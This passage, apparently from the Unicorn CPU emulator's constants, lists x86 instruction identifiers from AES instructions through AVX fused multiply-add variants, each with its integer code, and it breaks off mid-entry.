UC_X86_INS_AESDECLAST = 19 UC_X86_INS_AESDEC = 20 UC_X86_INS_AESENCLAST = 21 UC_X86_INS_AESENC = 22 UC_X86_INS_AESIMC = 23 UC_X86_INS_AESKEYGENASSIST = 24 UC_X86_INS_AND = 25 UC_X86_INS_ANDN = 26 UC_X86_INS_ANDNPD = 27 UC_X86_INS_ANDNPS = 28 UC_X86_INS_ANDPD = 29 UC_X86_INS_ANDPS = 30 UC_X86_INS_ARPL = 31 UC_X86_INS_BEXTR = 32 UC_X86_INS_BLCFILL = 33 UC_X86_INS_BLCI = 34 UC_X86_INS_BLCIC = 35 UC_X86_INS_BLCMSK = 36 UC_X86_INS_BLCS = 37 UC_X86_INS_BLENDPD = 38 UC_X86_INS_BLENDPS = 39 
UC_X86_INS_BLENDVPD = 40 UC_X86_INS_BLENDVPS = 41 UC_X86_INS_BLSFILL = 42 UC_X86_INS_BLSI = 43 UC_X86_INS_BLSIC = 44 UC_X86_INS_BLSMSK = 45 UC_X86_INS_BLSR = 46 UC_X86_INS_BOUND = 47 UC_X86_INS_BSF = 48 UC_X86_INS_BSR = 49 UC_X86_INS_BSWAP = 50 UC_X86_INS_BT = 51 UC_X86_INS_BTC = 52 UC_X86_INS_BTR = 53 UC_X86_INS_BTS = 54 UC_X86_INS_BZHI = 55 UC_X86_INS_CALL = 56 UC_X86_INS_CBW = 57 UC_X86_INS_CDQ = 58 UC_X86_INS_CDQE = 59 UC_X86_INS_FCHS = 60 UC_X86_INS_CLAC = 61 UC_X86_INS_CLC = 62 UC_X86_INS_CLD = 63 UC_X86_INS_CLFLUSH = 64 UC_X86_INS_CLFLUSHOPT = 65 UC_X86_INS_CLGI = 66 UC_X86_INS_CLI = 67 UC_X86_INS_CLTS = 68 UC_X86_INS_CLWB = 69 UC_X86_INS_CMC = 70 UC_X86_INS_CMOVA = 71 UC_X86_INS_CMOVAE = 72 UC_X86_INS_CMOVB = 73 UC_X86_INS_CMOVBE = 74 UC_X86_INS_FCMOVBE = 75 UC_X86_INS_FCMOVB = 76 UC_X86_INS_CMOVE = 77 UC_X86_INS_FCMOVE = 78 UC_X86_INS_CMOVG = 79 UC_X86_INS_CMOVGE = 80 UC_X86_INS_CMOVL = 81 UC_X86_INS_CMOVLE = 82 UC_X86_INS_FCMOVNBE = 83 UC_X86_INS_FCMOVNB = 84 UC_X86_INS_CMOVNE = 85 UC_X86_INS_FCMOVNE = 86 UC_X86_INS_CMOVNO = 87 UC_X86_INS_CMOVNP = 88 UC_X86_INS_FCMOVNU = 89 UC_X86_INS_CMOVNS = 90 UC_X86_INS_CMOVO = 91 UC_X86_INS_CMOVP = 92 UC_X86_INS_FCMOVU = 93 UC_X86_INS_CMOVS = 94 UC_X86_INS_CMP = 95 UC_X86_INS_CMPPD = 96 UC_X86_INS_CMPPS = 97 UC_X86_INS_CMPSB = 98 UC_X86_INS_CMPSD = 99 UC_X86_INS_CMPSQ = 100 UC_X86_INS_CMPSS = 101 UC_X86_INS_CMPSW = 102 UC_X86_INS_CMPXCHG16B = 103 UC_X86_INS_CMPXCHG = 104 UC_X86_INS_CMPXCHG8B = 105 UC_X86_INS_COMISD = 106 UC_X86_INS_COMISS = 107 UC_X86_INS_FCOMP = 108 UC_X86_INS_FCOMPI = 109 UC_X86_INS_FCOMI = 110 UC_X86_INS_FCOM = 111 UC_X86_INS_FCOS = 112 UC_X86_INS_CPUID = 113 UC_X86_INS_CQO = 114 UC_X86_INS_CRC32 = 115 UC_X86_INS_CVTDQ2PD = 116 UC_X86_INS_CVTDQ2PS = 117 UC_X86_INS_CVTPD2DQ = 118 UC_X86_INS_CVTPD2PS = 119 UC_X86_INS_CVTPS2DQ = 120 UC_X86_INS_CVTPS2PD = 121 UC_X86_INS_CVTSD2SI = 122 UC_X86_INS_CVTSD2SS = 123 UC_X86_INS_CVTSI2SD = 124 UC_X86_INS_CVTSI2SS = 125 UC_X86_INS_CVTSS2SD = 126 UC_X86_INS_CVTSS2SI = 127 UC_X86_INS_CVTTPD2DQ = 128 UC_X86_INS_CVTTPS2DQ = 129 UC_X86_INS_CVTTSD2SI = 130 UC_X86_INS_CVTTSS2SI = 131 UC_X86_INS_CWD = 132 UC_X86_INS_CWDE = 133 UC_X86_INS_DAA = 134 UC_X86_INS_DAS = 135 UC_X86_INS_DATA16 = 136 UC_X86_INS_DEC = 137 UC_X86_INS_DIV = 138 UC_X86_INS_DIVPD = 139 UC_X86_INS_DIVPS = 140 UC_X86_INS_FDIVR = 141 UC_X86_INS_FIDIVR = 142 UC_X86_INS_FDIVRP = 143 UC_X86_INS_DIVSD = 144 UC_X86_INS_DIVSS = 145 UC_X86_INS_FDIV = 146 UC_X86_INS_FIDIV = 147 UC_X86_INS_FDIVP = 148 UC_X86_INS_DPPD = 149 UC_X86_INS_DPPS = 150 UC_X86_INS_RET = 151 UC_X86_INS_ENCLS = 152 UC_X86_INS_ENCLU = 153 UC_X86_INS_ENTER = 154 UC_X86_INS_EXTRACTPS = 155 UC_X86_INS_EXTRQ = 156 UC_X86_INS_F2XM1 = 157 UC_X86_INS_LCALL = 158 UC_X86_INS_LJMP = 159 UC_X86_INS_FBLD = 160 UC_X86_INS_FBSTP = 161 UC_X86_INS_FCOMPP = 162 UC_X86_INS_FDECSTP = 163 UC_X86_INS_FEMMS = 164 UC_X86_INS_FFREE = 165 UC_X86_INS_FICOM = 166 UC_X86_INS_FICOMP = 167 UC_X86_INS_FINCSTP = 168 UC_X86_INS_FLDCW = 169 UC_X86_INS_FLDENV = 170 UC_X86_INS_FLDL2E = 171 UC_X86_INS_FLDL2T = 172 UC_X86_INS_FLDLG2 = 173 UC_X86_INS_FLDLN2 = 174 UC_X86_INS_FLDPI = 175 UC_X86_INS_FNCLEX = 176 UC_X86_INS_FNINIT = 177 UC_X86_INS_FNOP = 178 UC_X86_INS_FNSTCW = 179 UC_X86_INS_FNSTSW = 180 UC_X86_INS_FPATAN = 181 UC_X86_INS_FPREM = 182 UC_X86_INS_FPREM1 = 183 UC_X86_INS_FPTAN = 184 UC_X86_INS_FFREEP = 185 UC_X86_INS_FRNDINT = 186 UC_X86_INS_FRSTOR = 187 UC_X86_INS_FNSAVE = 188 UC_X86_INS_FSCALE = 189 UC_X86_INS_FSETPM = 190 UC_X86_INS_FSINCOS = 191 UC_X86_INS_FNSTENV = 192 UC_X86_INS_FXAM 
= 193 UC_X86_INS_FXRSTOR = 194 UC_X86_INS_FXRSTOR64 = 195 UC_X86_INS_FXSAVE = 196 UC_X86_INS_FXSAVE64 = 197 UC_X86_INS_FXTRACT = 198 UC_X86_INS_FYL2X = 199 UC_X86_INS_FYL2XP1 = 200 UC_X86_INS_MOVAPD = 201 UC_X86_INS_MOVAPS = 202 UC_X86_INS_ORPD = 203 UC_X86_INS_ORPS = 204 UC_X86_INS_VMOVAPD = 205 UC_X86_INS_VMOVAPS = 206 UC_X86_INS_XORPD = 207 UC_X86_INS_XORPS = 208 UC_X86_INS_GETSEC = 209 UC_X86_INS_HADDPD = 210 UC_X86_INS_HADDPS = 211 UC_X86_INS_HLT = 212 UC_X86_INS_HSUBPD = 213 UC_X86_INS_HSUBPS = 214 UC_X86_INS_IDIV = 215 UC_X86_INS_FILD = 216 UC_X86_INS_IMUL = 217 UC_X86_INS_IN = 218 UC_X86_INS_INC = 219 UC_X86_INS_INSB = 220 UC_X86_INS_INSERTPS = 221 UC_X86_INS_INSERTQ = 222 UC_X86_INS_INSD = 223 UC_X86_INS_INSW = 224 UC_X86_INS_INT = 225 UC_X86_INS_INT1 = 226 UC_X86_INS_INT3 = 227 UC_X86_INS_INTO = 228 UC_X86_INS_INVD = 229 UC_X86_INS_INVEPT = 230 UC_X86_INS_INVLPG = 231 UC_X86_INS_INVLPGA = 232 UC_X86_INS_INVPCID = 233 UC_X86_INS_INVVPID = 234 UC_X86_INS_IRET = 235 UC_X86_INS_IRETD = 236 UC_X86_INS_IRETQ = 237 UC_X86_INS_FISTTP = 238 UC_X86_INS_FIST = 239 UC_X86_INS_FISTP = 240 UC_X86_INS_UCOMISD = 241 UC_X86_INS_UCOMISS = 242 UC_X86_INS_VCOMISD = 243 UC_X86_INS_VCOMISS = 244 UC_X86_INS_VCVTSD2SS = 245 UC_X86_INS_VCVTSI2SD = 246 UC_X86_INS_VCVTSI2SS = 247 UC_X86_INS_VCVTSS2SD = 248 UC_X86_INS_VCVTTSD2SI = 249 UC_X86_INS_VCVTTSD2USI = 250 UC_X86_INS_VCVTTSS2SI = 251 UC_X86_INS_VCVTTSS2USI = 252 UC_X86_INS_VCVTUSI2SD = 253 UC_X86_INS_VCVTUSI2SS = 254 UC_X86_INS_VUCOMISD = 255 UC_X86_INS_VUCOMISS = 256 UC_X86_INS_JAE = 257 UC_X86_INS_JA = 258 UC_X86_INS_JBE = 259 UC_X86_INS_JB = 260 UC_X86_INS_JCXZ = 261 UC_X86_INS_JECXZ = 262 UC_X86_INS_JE = 263 UC_X86_INS_JGE = 264 UC_X86_INS_JG = 265 UC_X86_INS_JLE = 266 UC_X86_INS_JL = 267 UC_X86_INS_JMP = 268 UC_X86_INS_JNE = 269 UC_X86_INS_JNO = 270 UC_X86_INS_JNP = 271 UC_X86_INS_JNS = 272 UC_X86_INS_JO = 273 UC_X86_INS_JP = 274 UC_X86_INS_JRCXZ = 275 UC_X86_INS_JS = 276 UC_X86_INS_KANDB = 277 UC_X86_INS_KANDD = 278 UC_X86_INS_KANDNB = 279 UC_X86_INS_KANDND = 280 UC_X86_INS_KANDNQ = 281 UC_X86_INS_KANDNW = 282 UC_X86_INS_KANDQ = 283 UC_X86_INS_KANDW = 284 UC_X86_INS_KMOVB = 285 UC_X86_INS_KMOVD = 286 UC_X86_INS_KMOVQ = 287 UC_X86_INS_KMOVW = 288 UC_X86_INS_KNOTB = 289 UC_X86_INS_KNOTD = 290 UC_X86_INS_KNOTQ = 291 UC_X86_INS_KNOTW = 292 UC_X86_INS_KORB = 293 UC_X86_INS_KORD = 294 UC_X86_INS_KORQ = 295 UC_X86_INS_KORTESTB = 296 UC_X86_INS_KORTESTD = 297 UC_X86_INS_KORTESTQ = 298 UC_X86_INS_KORTESTW = 299 UC_X86_INS_KORW = 300 UC_X86_INS_KSHIFTLB = 301 UC_X86_INS_KSHIFTLD = 302 UC_X86_INS_KSHIFTLQ = 303 UC_X86_INS_KSHIFTLW = 304 UC_X86_INS_KSHIFTRB = 305 UC_X86_INS_KSHIFTRD = 306 UC_X86_INS_KSHIFTRQ = 307 UC_X86_INS_KSHIFTRW = 308 UC_X86_INS_KUNPCKBW = 309 UC_X86_INS_KXNORB = 310 UC_X86_INS_KXNORD = 311 UC_X86_INS_KXNORQ = 312 UC_X86_INS_KXNORW = 313 UC_X86_INS_KXORB = 314 UC_X86_INS_KXORD = 315 UC_X86_INS_KXORQ = 316 UC_X86_INS_KXORW = 317 UC_X86_INS_LAHF = 318 UC_X86_INS_LAR = 319 UC_X86_INS_LDDQU = 320 UC_X86_INS_LDMXCSR = 321 UC_X86_INS_LDS = 322 UC_X86_INS_FLDZ = 323 UC_X86_INS_FLD1 = 324 UC_X86_INS_FLD = 325 UC_X86_INS_LEA = 326 UC_X86_INS_LEAVE = 327 UC_X86_INS_LES = 328 UC_X86_INS_LFENCE = 329 UC_X86_INS_LFS = 330 UC_X86_INS_LGDT = 331 UC_X86_INS_LGS = 332 UC_X86_INS_LIDT = 333 UC_X86_INS_LLDT = 334 UC_X86_INS_LMSW = 335 UC_X86_INS_OR = 336 UC_X86_INS_SUB = 337 UC_X86_INS_XOR = 338 UC_X86_INS_LODSB = 339 UC_X86_INS_LODSD = 340 UC_X86_INS_LODSQ = 341 UC_X86_INS_LODSW = 342 UC_X86_INS_LOOP = 343 UC_X86_INS_LOOPE = 344 UC_X86_INS_LOOPNE = 345 
UC_X86_INS_RETF = 346 UC_X86_INS_RETFQ = 347 UC_X86_INS_LSL = 348 UC_X86_INS_LSS = 349 UC_X86_INS_LTR = 350 UC_X86_INS_XADD = 351 UC_X86_INS_LZCNT = 352 UC_X86_INS_MASKMOVDQU = 353 UC_X86_INS_MAXPD = 354 UC_X86_INS_MAXPS = 355 UC_X86_INS_MAXSD = 356 UC_X86_INS_MAXSS = 357 UC_X86_INS_MFENCE = 358 UC_X86_INS_MINPD = 359 UC_X86_INS_MINPS = 360 UC_X86_INS_MINSD = 361 UC_X86_INS_MINSS = 362 UC_X86_INS_CVTPD2PI = 363 UC_X86_INS_CVTPI2PD = 364 UC_X86_INS_CVTPI2PS = 365 UC_X86_INS_CVTPS2PI = 366 UC_X86_INS_CVTTPD2PI = 367 UC_X86_INS_CVTTPS2PI = 368 UC_X86_INS_EMMS = 369 UC_X86_INS_MASKMOVQ = 370 UC_X86_INS_MOVD = 371 UC_X86_INS_MOVDQ2Q = 372 UC_X86_INS_MOVNTQ = 373 UC_X86_INS_MOVQ2DQ = 374 UC_X86_INS_MOVQ = 375 UC_X86_INS_PABSB = 376 UC_X86_INS_PABSD = 377 UC_X86_INS_PABSW = 378 UC_X86_INS_PACKSSDW = 379 UC_X86_INS_PACKSSWB = 380 UC_X86_INS_PACKUSWB = 381 UC_X86_INS_PADDB = 382 UC_X86_INS_PADDD = 383 UC_X86_INS_PADDQ = 384 UC_X86_INS_PADDSB = 385 UC_X86_INS_PADDSW = 386 UC_X86_INS_PADDUSB = 387 UC_X86_INS_PADDUSW = 388 UC_X86_INS_PADDW = 389 UC_X86_INS_PALIGNR = 390 UC_X86_INS_PANDN = 391 UC_X86_INS_PAND = 392 UC_X86_INS_PAVGB = 393 UC_X86_INS_PAVGW = 394 UC_X86_INS_PCMPEQB = 395 UC_X86_INS_PCMPEQD = 396 UC_X86_INS_PCMPEQW = 397 UC_X86_INS_PCMPGTB = 398 UC_X86_INS_PCMPGTD = 399 UC_X86_INS_PCMPGTW = 400 UC_X86_INS_PEXTRW = 401 UC_X86_INS_PHADDSW = 402 UC_X86_INS_PHADDW = 403 UC_X86_INS_PHADDD = 404 UC_X86_INS_PHSUBD = 405 UC_X86_INS_PHSUBSW = 406 UC_X86_INS_PHSUBW = 407 UC_X86_INS_PINSRW = 408 UC_X86_INS_PMADDUBSW = 409 UC_X86_INS_PMADDWD = 410 UC_X86_INS_PMAXSW = 411 UC_X86_INS_PMAXUB = 412 UC_X86_INS_PMINSW = 413 UC_X86_INS_PMINUB = 414 UC_X86_INS_PMOVMSKB = 415 UC_X86_INS_PMULHRSW = 416 UC_X86_INS_PMULHUW = 417 UC_X86_INS_PMULHW = 418 UC_X86_INS_PMULLW = 419 UC_X86_INS_PMULUDQ = 420 UC_X86_INS_POR = 421 UC_X86_INS_PSADBW = 422 UC_X86_INS_PSHUFB = 423 UC_X86_INS_PSHUFW = 424 UC_X86_INS_PSIGNB = 425 UC_X86_INS_PSIGND = 426 UC_X86_INS_PSIGNW = 427 UC_X86_INS_PSLLD = 428 UC_X86_INS_PSLLQ = 429 UC_X86_INS_PSLLW = 430 UC_X86_INS_PSRAD = 431 UC_X86_INS_PSRAW = 432 UC_X86_INS_PSRLD = 433 UC_X86_INS_PSRLQ = 434 UC_X86_INS_PSRLW = 435 UC_X86_INS_PSUBB = 436 UC_X86_INS_PSUBD = 437 UC_X86_INS_PSUBQ = 438 UC_X86_INS_PSUBSB = 439 UC_X86_INS_PSUBSW = 440 UC_X86_INS_PSUBUSB = 441 UC_X86_INS_PSUBUSW = 442 UC_X86_INS_PSUBW = 443 UC_X86_INS_PUNPCKHBW = 444 UC_X86_INS_PUNPCKHDQ = 445 UC_X86_INS_PUNPCKHWD = 446 UC_X86_INS_PUNPCKLBW = 447 UC_X86_INS_PUNPCKLDQ = 448 UC_X86_INS_PUNPCKLWD = 449 UC_X86_INS_PXOR = 450 UC_X86_INS_MONITOR = 451 UC_X86_INS_MONTMUL = 452 UC_X86_INS_MOV = 453 UC_X86_INS_MOVABS = 454 UC_X86_INS_MOVBE = 455 UC_X86_INS_MOVDDUP = 456 UC_X86_INS_MOVDQA = 457 UC_X86_INS_MOVDQU = 458 UC_X86_INS_MOVHLPS = 459 UC_X86_INS_MOVHPD = 460 UC_X86_INS_MOVHPS = 461 UC_X86_INS_MOVLHPS = 462 UC_X86_INS_MOVLPD = 463 UC_X86_INS_MOVLPS = 464 UC_X86_INS_MOVMSKPD = 465 UC_X86_INS_MOVMSKPS = 466 UC_X86_INS_MOVNTDQA = 467 UC_X86_INS_MOVNTDQ = 468 UC_X86_INS_MOVNTI = 469 UC_X86_INS_MOVNTPD = 470 UC_X86_INS_MOVNTPS = 471 UC_X86_INS_MOVNTSD = 472 UC_X86_INS_MOVNTSS = 473 UC_X86_INS_MOVSB = 474 UC_X86_INS_MOVSD = 475 UC_X86_INS_MOVSHDUP = 476 UC_X86_INS_MOVSLDUP = 477 UC_X86_INS_MOVSQ = 478 UC_X86_INS_MOVSS = 479 UC_X86_INS_MOVSW = 480 UC_X86_INS_MOVSX = 481 UC_X86_INS_MOVSXD = 482 UC_X86_INS_MOVUPD = 483 UC_X86_INS_MOVUPS = 484 UC_X86_INS_MOVZX = 485 UC_X86_INS_MPSADBW = 486 UC_X86_INS_MUL = 487 UC_X86_INS_MULPD = 488 UC_X86_INS_MULPS = 489 UC_X86_INS_MULSD = 490 UC_X86_INS_MULSS = 491 UC_X86_INS_MULX = 492 
UC_X86_INS_FMUL = 493 UC_X86_INS_FIMUL = 494 UC_X86_INS_FMULP = 495 UC_X86_INS_MWAIT = 496 UC_X86_INS_NEG = 497 UC_X86_INS_NOP = 498 UC_X86_INS_NOT = 499 UC_X86_INS_OUT = 500 UC_X86_INS_OUTSB = 501 UC_X86_INS_OUTSD = 502 UC_X86_INS_OUTSW = 503 UC_X86_INS_PACKUSDW = 504 UC_X86_INS_PAUSE = 505 UC_X86_INS_PAVGUSB = 506 UC_X86_INS_PBLENDVB = 507 UC_X86_INS_PBLENDW = 508 UC_X86_INS_PCLMULQDQ = 509 UC_X86_INS_PCMPEQQ = 510 UC_X86_INS_PCMPESTRI = 511 UC_X86_INS_PCMPESTRM = 512 UC_X86_INS_PCMPGTQ = 513 UC_X86_INS_PCMPISTRI = 514 UC_X86_INS_PCMPISTRM = 515 UC_X86_INS_PCOMMIT = 516 UC_X86_INS_PDEP = 517 UC_X86_INS_PEXT = 518 UC_X86_INS_PEXTRB = 519 UC_X86_INS_PEXTRD = 520 UC_X86_INS_PEXTRQ = 521 UC_X86_INS_PF2ID = 522 UC_X86_INS_PF2IW = 523 UC_X86_INS_PFACC = 524 UC_X86_INS_PFADD = 525 UC_X86_INS_PFCMPEQ = 526 UC_X86_INS_PFCMPGE = 527 UC_X86_INS_PFCMPGT = 528 UC_X86_INS_PFMAX = 529 UC_X86_INS_PFMIN = 530 UC_X86_INS_PFMUL = 531 UC_X86_INS_PFNACC = 532 UC_X86_INS_PFPNACC = 533 UC_X86_INS_PFRCPIT1 = 534 UC_X86_INS_PFRCPIT2 = 535 UC_X86_INS_PFRCP = 536 UC_X86_INS_PFRSQIT1 = 537 UC_X86_INS_PFRSQRT = 538 UC_X86_INS_PFSUBR = 539 UC_X86_INS_PFSUB = 540 UC_X86_INS_PHMINPOSUW = 541 UC_X86_INS_PI2FD = 542 UC_X86_INS_PI2FW = 543 UC_X86_INS_PINSRB = 544 UC_X86_INS_PINSRD = 545 UC_X86_INS_PINSRQ = 546 UC_X86_INS_PMAXSB = 547 UC_X86_INS_PMAXSD = 548 UC_X86_INS_PMAXUD = 549 UC_X86_INS_PMAXUW = 550 UC_X86_INS_PMINSB = 551 UC_X86_INS_PMINSD = 552 UC_X86_INS_PMINUD = 553 UC_X86_INS_PMINUW = 554 UC_X86_INS_PMOVSXBD = 555 UC_X86_INS_PMOVSXBQ = 556 UC_X86_INS_PMOVSXBW = 557 UC_X86_INS_PMOVSXDQ = 558 UC_X86_INS_PMOVSXWD = 559 UC_X86_INS_PMOVSXWQ = 560 UC_X86_INS_PMOVZXBD = 561 UC_X86_INS_PMOVZXBQ = 562 UC_X86_INS_PMOVZXBW = 563 UC_X86_INS_PMOVZXDQ = 564 UC_X86_INS_PMOVZXWD = 565 UC_X86_INS_PMOVZXWQ = 566 UC_X86_INS_PMULDQ = 567 UC_X86_INS_PMULHRW = 568 UC_X86_INS_PMULLD = 569 UC_X86_INS_POP = 570 UC_X86_INS_POPAW = 571 UC_X86_INS_POPAL = 572 UC_X86_INS_POPCNT = 573 UC_X86_INS_POPF = 574 UC_X86_INS_POPFD = 575 UC_X86_INS_POPFQ = 576 UC_X86_INS_PREFETCH = 577 UC_X86_INS_PREFETCHNTA = 578 UC_X86_INS_PREFETCHT0 = 579 UC_X86_INS_PREFETCHT1 = 580 UC_X86_INS_PREFETCHT2 = 581 UC_X86_INS_PREFETCHW = 582 UC_X86_INS_PSHUFD = 583 UC_X86_INS_PSHUFHW = 584 UC_X86_INS_PSHUFLW = 585 UC_X86_INS_PSLLDQ = 586 UC_X86_INS_PSRLDQ = 587 UC_X86_INS_PSWAPD = 588 UC_X86_INS_PTEST = 589 UC_X86_INS_PUNPCKHQDQ = 590 UC_X86_INS_PUNPCKLQDQ = 591 UC_X86_INS_PUSH = 592 UC_X86_INS_PUSHAW = 593 UC_X86_INS_PUSHAL = 594 UC_X86_INS_PUSHF = 595 UC_X86_INS_PUSHFD = 596 UC_X86_INS_PUSHFQ = 597 UC_X86_INS_RCL = 598 UC_X86_INS_RCPPS = 599 UC_X86_INS_RCPSS = 600 UC_X86_INS_RCR = 601 UC_X86_INS_RDFSBASE = 602 UC_X86_INS_RDGSBASE = 603 UC_X86_INS_RDMSR = 604 UC_X86_INS_RDPMC = 605 UC_X86_INS_RDRAND = 606 UC_X86_INS_RDSEED = 607 UC_X86_INS_RDTSC = 608 UC_X86_INS_RDTSCP = 609 UC_X86_INS_ROL = 610 UC_X86_INS_ROR = 611 UC_X86_INS_RORX = 612 UC_X86_INS_ROUNDPD = 613 UC_X86_INS_ROUNDPS = 614 UC_X86_INS_ROUNDSD = 615 UC_X86_INS_ROUNDSS = 616 UC_X86_INS_RSM = 617 UC_X86_INS_RSQRTPS = 618 UC_X86_INS_RSQRTSS = 619 UC_X86_INS_SAHF = 620 UC_X86_INS_SAL = 621 UC_X86_INS_SALC = 622 UC_X86_INS_SAR = 623 UC_X86_INS_SARX = 624 UC_X86_INS_SBB = 625 UC_X86_INS_SCASB = 626 UC_X86_INS_SCASD = 627 UC_X86_INS_SCASQ = 628 UC_X86_INS_SCASW = 629 UC_X86_INS_SETAE = 630 UC_X86_INS_SETA = 631 UC_X86_INS_SETBE = 632 UC_X86_INS_SETB = 633 UC_X86_INS_SETE = 634 UC_X86_INS_SETGE = 635 UC_X86_INS_SETG = 636 UC_X86_INS_SETLE = 637 UC_X86_INS_SETL = 638 UC_X86_INS_SETNE = 639 UC_X86_INS_SETNO = 640 
UC_X86_INS_SETNP = 641 UC_X86_INS_SETNS = 642 UC_X86_INS_SETO = 643 UC_X86_INS_SETP = 644 UC_X86_INS_SETS = 645 UC_X86_INS_SFENCE = 646 UC_X86_INS_SGDT = 647 UC_X86_INS_SHA1MSG1 = 648 UC_X86_INS_SHA1MSG2 = 649 UC_X86_INS_SHA1NEXTE = 650 UC_X86_INS_SHA1RNDS4 = 651 UC_X86_INS_SHA256MSG1 = 652 UC_X86_INS_SHA256MSG2 = 653 UC_X86_INS_SHA256RNDS2 = 654 UC_X86_INS_SHL = 655 UC_X86_INS_SHLD = 656 UC_X86_INS_SHLX = 657 UC_X86_INS_SHR = 658 UC_X86_INS_SHRD = 659 UC_X86_INS_SHRX = 660 UC_X86_INS_SHUFPD = 661 UC_X86_INS_SHUFPS = 662 UC_X86_INS_SIDT = 663 UC_X86_INS_FSIN = 664 UC_X86_INS_SKINIT = 665 UC_X86_INS_SLDT = 666 UC_X86_INS_SMSW = 667 UC_X86_INS_SQRTPD = 668 UC_X86_INS_SQRTPS = 669 UC_X86_INS_SQRTSD = 670 UC_X86_INS_SQRTSS = 671 UC_X86_INS_FSQRT = 672 UC_X86_INS_STAC = 673 UC_X86_INS_STC = 674 UC_X86_INS_STD = 675 UC_X86_INS_STGI = 676 UC_X86_INS_STI = 677 UC_X86_INS_STMXCSR = 678 UC_X86_INS_STOSB = 679 UC_X86_INS_STOSD = 680 UC_X86_INS_STOSQ = 681 UC_X86_INS_STOSW = 682 UC_X86_INS_STR = 683 UC_X86_INS_FST = 684 UC_X86_INS_FSTP = 685 UC_X86_INS_FSTPNCE = 686 UC_X86_INS_FXCH = 687 UC_X86_INS_SUBPD = 688 UC_X86_INS_SUBPS = 689 UC_X86_INS_FSUBR = 690 UC_X86_INS_FISUBR = 691 UC_X86_INS_FSUBRP = 692 UC_X86_INS_SUBSD = 693 UC_X86_INS_SUBSS = 694 UC_X86_INS_FSUB = 695 UC_X86_INS_FISUB = 696 UC_X86_INS_FSUBP = 697 UC_X86_INS_SWAPGS = 698 UC_X86_INS_SYSCALL = 699 UC_X86_INS_SYSENTER = 700 UC_X86_INS_SYSEXIT = 701 UC_X86_INS_SYSRET = 702 UC_X86_INS_T1MSKC = 703 UC_X86_INS_TEST = 704 UC_X86_INS_UD2 = 705 UC_X86_INS_FTST = 706 UC_X86_INS_TZCNT = 707 UC_X86_INS_TZMSK = 708 UC_X86_INS_FUCOMPI = 709 UC_X86_INS_FUCOMI = 710 UC_X86_INS_FUCOMPP = 711 UC_X86_INS_FUCOMP = 712 UC_X86_INS_FUCOM = 713 UC_X86_INS_UD2B = 714 UC_X86_INS_UNPCKHPD = 715 UC_X86_INS_UNPCKHPS = 716 UC_X86_INS_UNPCKLPD = 717 UC_X86_INS_UNPCKLPS = 718 UC_X86_INS_VADDPD = 719 UC_X86_INS_VADDPS = 720 UC_X86_INS_VADDSD = 721 UC_X86_INS_VADDSS = 722 UC_X86_INS_VADDSUBPD = 723 UC_X86_INS_VADDSUBPS = 724 UC_X86_INS_VAESDECLAST = 725 UC_X86_INS_VAESDEC = 726 UC_X86_INS_VAESENCLAST = 727 UC_X86_INS_VAESENC = 728 UC_X86_INS_VAESIMC = 729 UC_X86_INS_VAESKEYGENASSIST = 730 UC_X86_INS_VALIGND = 731 UC_X86_INS_VALIGNQ = 732 UC_X86_INS_VANDNPD = 733 UC_X86_INS_VANDNPS = 734 UC_X86_INS_VANDPD = 735 UC_X86_INS_VANDPS = 736 UC_X86_INS_VBLENDMPD = 737 UC_X86_INS_VBLENDMPS = 738 UC_X86_INS_VBLENDPD = 739 UC_X86_INS_VBLENDPS = 740 UC_X86_INS_VBLENDVPD = 741 UC_X86_INS_VBLENDVPS = 742 UC_X86_INS_VBROADCASTF128 = 743 UC_X86_INS_VBROADCASTI32X4 = 744 UC_X86_INS_VBROADCASTI64X4 = 745 UC_X86_INS_VBROADCASTSD = 746 UC_X86_INS_VBROADCASTSS = 747 UC_X86_INS_VCMPPD = 748 UC_X86_INS_VCMPPS = 749 UC_X86_INS_VCMPSD = 750 UC_X86_INS_VCMPSS = 751 UC_X86_INS_VCOMPRESSPD = 752 UC_X86_INS_VCOMPRESSPS = 753 UC_X86_INS_VCVTDQ2PD = 754 UC_X86_INS_VCVTDQ2PS = 755 UC_X86_INS_VCVTPD2DQX = 756 UC_X86_INS_VCVTPD2DQ = 757 UC_X86_INS_VCVTPD2PSX = 758 UC_X86_INS_VCVTPD2PS = 759 UC_X86_INS_VCVTPD2UDQ = 760 UC_X86_INS_VCVTPH2PS = 761 UC_X86_INS_VCVTPS2DQ = 762 UC_X86_INS_VCVTPS2PD = 763 UC_X86_INS_VCVTPS2PH = 764 UC_X86_INS_VCVTPS2UDQ = 765 UC_X86_INS_VCVTSD2SI = 766 UC_X86_INS_VCVTSD2USI = 767 UC_X86_INS_VCVTSS2SI = 768 UC_X86_INS_VCVTSS2USI = 769 UC_X86_INS_VCVTTPD2DQX = 770 UC_X86_INS_VCVTTPD2DQ = 771 UC_X86_INS_VCVTTPD2UDQ = 772 UC_X86_INS_VCVTTPS2DQ = 773 UC_X86_INS_VCVTTPS2UDQ = 774 UC_X86_INS_VCVTUDQ2PD = 775 UC_X86_INS_VCVTUDQ2PS = 776 UC_X86_INS_VDIVPD = 777 UC_X86_INS_VDIVPS = 778 UC_X86_INS_VDIVSD = 779 UC_X86_INS_VDIVSS = 780 UC_X86_INS_VDPPD = 781 UC_X86_INS_VDPPS = 782 
UC_X86_INS_VERR = 783 UC_X86_INS_VERW = 784 UC_X86_INS_VEXP2PD = 785 UC_X86_INS_VEXP2PS = 786 UC_X86_INS_VEXPANDPD = 787 UC_X86_INS_VEXPANDPS = 788 UC_X86_INS_VEXTRACTF128 = 789 UC_X86_INS_VEXTRACTF32X4 = 790 UC_X86_INS_VEXTRACTF64X4 = 791 UC_X86_INS_VEXTRACTI128 = 792 UC_X86_INS_VEXTRACTI32X4 = 793 UC_X86_INS_VEXTRACTI64X4 = 794 UC_X86_INS_VEXTRACTPS = 795 UC_X86_INS_VFMADD132PD = 796 UC_X86_INS_VFMADD132PS = 797 UC_X86_INS_VFMADDPD = 798 UC_X86_INS_VFMADD213PD = 799 UC_X86_INS_VFMADD231PD = 800 UC_X86_INS_VFMADDPS = 801 UC_X86_INS_VFMADD213PS = 802 UC_X86_INS_VFMADD231PS = 803 UC_X86_INS_VFMADDSD = 804 UC_X86_INS_VFMADD213SD = 805 UC_X86_INS_VFMADD132SD = 806 UC_X86_INS_VFMADD231SD = 807 UC_X86_INS_VFMADDSS = 808 UC_X86_INS_VFMADD213SS = 809 UC_X86_INS_VFMADD132SS = 810 UC_X86_INS_VFMADD231SS = 811 UC_X86_INS_VFMADDSUB132PD = 812 UC_X86_INS_VFMADDSUB132PS = 813 UC_X86_INS_VFMADDSUBPD = 814 UC_X86_INS_VFMADDSUB213PD = 815 UC_X86_INS_VFMADDSUB231PD = 